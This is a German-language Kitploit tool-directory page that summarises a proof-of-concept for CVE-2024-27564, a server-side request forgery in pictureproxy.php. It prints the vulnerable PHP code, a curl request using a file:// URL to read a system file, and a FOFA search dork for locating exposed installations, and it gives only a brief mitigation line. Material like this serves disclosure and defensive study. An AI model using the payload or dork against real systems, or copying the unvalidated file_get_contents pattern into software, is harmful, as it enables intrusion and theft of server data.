Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-27564 — Proof-of-Concept für CVE-2024-27564, eine nicht authentifizierte SSRF in pictureproxy.php über den url-Parameter, mit verwundbarem Code, curl-PoC und Hinweisen zur Behebung. | Kitploit
Tools/GitHubGitHub/babydessy/cve-2024-27564
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & Forschung
GitHubbabydessy/cve-2024-27564

CVE-2024-27564

Proof-of-Concept für CVE-2024-27564, eine nicht authentifizierte SSRF in pictureproxy.php über den url-Parameter, mit verwundbarem Code, curl-PoC und Hinweisen zur Behebung.

Repository anzeigen
31vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-27564

Beschreibung:

Eine Schwachstelle in pictureproxy.php ermöglicht es entfernten Angreifern, beliebige Anfragen durchzuführen, indem sie URLs in den url-Parameter injizieren. Diese SSRF-Schwachstelle kann ohne Authentifizierung ausgenutzt werden, was sie besonders gefährlich macht.

Der verwundbare Code befindet sich in der Datei pictureproxy.php. Das Problem tritt auf, weil die Funktion den Parameter url nicht ordnungsgemäß validiert. Die Variable $_GET['url'] wird an die Funktion file_get_contents() übergeben, die Inhalte von der angegebenen URL abruft. Dies kann zu SSRF führen.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl-Anfrage:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Gegenmaßnahmen:

Ein ordnungsgemäßes Management der Eingabevalidierung ist erforderlich.

Tool herunterladen